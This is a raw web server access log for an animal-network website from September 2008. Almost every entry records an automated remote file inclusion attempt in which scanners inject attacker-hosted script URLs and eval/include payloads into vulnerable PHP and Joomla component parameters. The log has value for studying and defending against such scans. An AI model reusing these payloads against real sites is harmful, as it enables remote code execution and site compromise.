64.15.129.168 - - [07/Sep/2008:02:20:20 -0700] "GET /logs/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "theanimalnetwork.net"
64.15.129.168 - - [07/Sep/2008:02:20:35 -0700] "GET /component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.muhtaroglu.com.tr/bo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:02:22:06 -0700] "GET /logs/access.log/?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:02:22:06 -0700] "GET /?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:02:22:06 -0700] "GET /logs/?sourcedir=http://www.aquaentellius.com/readme1.txt????? HTTP/1.1" 200 1796 "-" "libwww-perl/5.810" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:23:13 -0700] "GET /logs/access.log/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:23:14 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:23:28 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:02:24:30 -0700] "GET /logs/access_080723.log//forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:02:24:30 -0700] "GET /logs//forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:02:24:56 -0700] "GET /logs/access_080729.log//forum/?sourcedir=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:27:10 -0700] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:29:57 -0700] "GET /logs/access.log/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:29:57 -0700] "GET /netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:29:57 -0700] "GET /logs/netcat/htmledit//join.php?DOCUMENT_ROOT=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:33:41 -0700] "GET //e404.php?INCLUDE_FOLDER=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:39:13 -0700] "GET /logs/access.log//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:39:14 -0700] "GET //adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:39:14 -0700] "GET /logs//adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
66.230.194.41 - - [07/Sep/2008:02:39:28 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://bodabagtribe.net/.../.thumb/del.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
74.6.22.166 - - [07/Sep/2008:02:41:49 -0700] "GET /logs/access_080401.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "theanimalnetwork.net"
122.201.81.53 - - [07/Sep/2008:02:46:37 -0700] "GET //convert/mvcw.php?step=1&vwar_root=http://willsponsor.org/.cgi/psy-bnc??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "theanimalnetwork.net"
217.160.189.11 - - [07/Sep/2008:02:47:11 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.unixserv.net/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:02:50:43 -0700] "GET /?custompluginfile[]=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 779 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
63.247.141.8 - - [07/Sep/2008:02:50:43 -0700] "GET /logs/?custompluginfile[]=http://oursoultvxq.com/bbs/data/test.txt? HTTP/1.1" 200 1796 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:02:50:46 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:02:50:47 -0700] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:02:50:49 -0700] "GET /logs///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:53:00 -0700] "GET /logs/access_080731.log//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:53:00 -0700] "GET //components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:53:00 -0700] "GET /logs//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:54:17 -0700] "GET /logs/access_080722.log//e404.php?INCLUDE_FOLDER=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:54:17 -0700] "GET //e404.php?INCLUDE_FOLDER=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:54:18 -0700] "GET /logs//e404.php?INCLUDE_FOLDER=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:02:56:14 -0700] "GET /logs/access_080729.log//components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:59:22 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:59:22 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:02:59:23 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:00:11 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:00:11 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:00:11 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:01:18 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:01:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
212.7.31.201 - - [07/Sep/2008:03:01:19 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://125.214.65.34/id.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:03:01:31 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
81.171.86.86 - - [07/Sep/2008:03:01:31 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.snapshotjourneys.com/lib/adodb_lite/wing.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:05 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:05 -0700] "GET /logs/access.log/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:05 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:05 -0700] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:06 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
118.127.10.64 - - [07/Sep/2008:03:02:06 -0700] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
82.194.86.185 - - [07/Sep/2008:03:03:32 -0700] "GET /logs/access_080722.log/?sourcedir=http://www.spd-esens.de/spd/contentimage/readme1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:03:04:47 -0700] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:03:09:46 -0700] "GET /logs/access.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:03:09:46 -0700] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
62.87.154.41 - - [07/Sep/2008:03:09:46 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:03:11:48 -0700] "GET /logs/access_080729.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:03:11:49 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
217.20.138.101 - - [07/Sep/2008:03:11:49 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://socomalliance.com/Ladders/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:03:13:18 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:03:13:20 -0700] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:03:13:21 -0700] "GET /logs///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
202.142.212.1 - - [07/Sep/2008:03:22:52 -0700] "GET ///vwar/backup/errors.php?error=http://wp1004891.wp009.webpack.hosteurope.de/otto/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "theanimalnetwork.net"
77.88.192.8 - - [07/Sep/2008:03:24:05 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:28:00 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:28:00 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:28:01 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:03:30:12 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.codeduc.cl/components/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
77.88.192.8 - - [07/Sep/2008:03:31:19 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
77.88.192.8 - - [07/Sep/2008:03:31:20 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
77.88.192.8 - - [07/Sep/2008:03:31:20 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
213.165.80.16 - - [07/Sep/2008:03:36:11 -0700] "GET /logs/access_080720.log//index.php?sayfa=http://tricospeb.net/wow/pix/al-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
213.165.80.16 - - [07/Sep/2008:03:36:11 -0700] "GET //index.php?sayfa=http://tricospeb.net/wow/pix/al-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
213.165.80.16 - - [07/Sep/2008:03:36:11 -0700] "GET /logs//index.php?sayfa=http://tricospeb.net/wow/pix/al-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
67.212.173.42 - - [07/Sep/2008:03:37:41 -0700] "GET /logs/access_080729.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "theanimalnetwork.net"
67.212.173.42 - - [07/Sep/2008:03:37:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "theanimalnetwork.net"
67.212.173.42 - - [07/Sep/2008:03:37:41 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://trieves-tourisme.fr/mini-sites/images/stories/ecuries-de-cornillon/e-com/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:03:40:59 -0700] "GET /logs/access_080722.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:03:40:59 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
195.39.5.203 - - [07/Sep/2008:03:40:59 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.geocities.com/kucluxanang/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
202.181.105.117 - - [07/Sep/2008:03:41:27 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
202.181.105.117 - - [07/Sep/2008:03:41:28 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "theanimalnetwork.net"
69.41.180.138 - - [07/Sep/2008:03:42:04 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "theanimalnetwork.net"
69.41.180.138 - - [07/Sep/2008:03:42:04 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "theanimalnetwork.net"
85.25.150.230 - - [07/Sep/2008:03:42:42 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "theanimalnetwork.net"
85.25.150.230 - - [07/Sep/2008:03:42:42 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "theanimalnetwork.net"
85.25.129.240 - - [07/Sep/2008:03:43:42 -0700] "GET //components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
85.25.129.240 - - [07/Sep/2008:03:43:43 -0700] "GET /logs//components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://lansites.ru//language/lang_english/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "theanimalnetwork.net"
190.54.62.91 - - [07/Sep/2008:03:46:42 -0700] "GET /logs/access.log//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
190.54.62.91 - - [07/Sep/2008:03:46:42 -0700] "GET /logs//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 200 1801 "-" "libwww-perl/5.79" "theanimalnetwork.net"
190.54.62.91 - - [07/Sep/2008:03:46:42 -0700] "GET //?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 200 779 "-" "libwww-perl/5.79" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:47:14 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:47:15 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
194.165.49.171 - - [07/Sep/2008:03:47:15 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.infernalis.de/cms/administrator/components/com_weblinks/.%20/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
77.88.192.8 - - [07/Sep/2008:03:52:28 -0700] "GET /logs/access_080722.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://socomalliance.com/Ladders/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "theanimalnetwork.net"
190.54.62.91 - - [07/Sep/2008:03:52:30 -0700] "GET /logs/access_080724.log//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
190.54.62.91 - - [07/Sep/2008:03:52:34 -0700] "GET /logs/access_080723.log//?prefix=http://www.folio.fr/images/inv?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
211.255.32.168 - - [07/Sep/2008:03:52:49 -0700] "GET /logs/access.log/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
211.255.32.168 - - [07/Sep/2008:03:52:54 -0700] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
211.255.32.168 - - [07/Sep/2008:03:52:57 -0700] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:03:53:42 -0700] "GET /logs/access.log//components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:03:53:42 -0700] "GET //components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.theanimalnetwork.net"
193.164.131.35 - - [07/Sep/2008:03:53:42 -0700] "GET /logs//components/com_directory/modules/mod_pxt_latest.php?GLOBALS%5bmosConfig_absolute_path%5d=http://vishalsingh.com/cms_//components/CMD.TXT? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.theanimalnetwork.net"
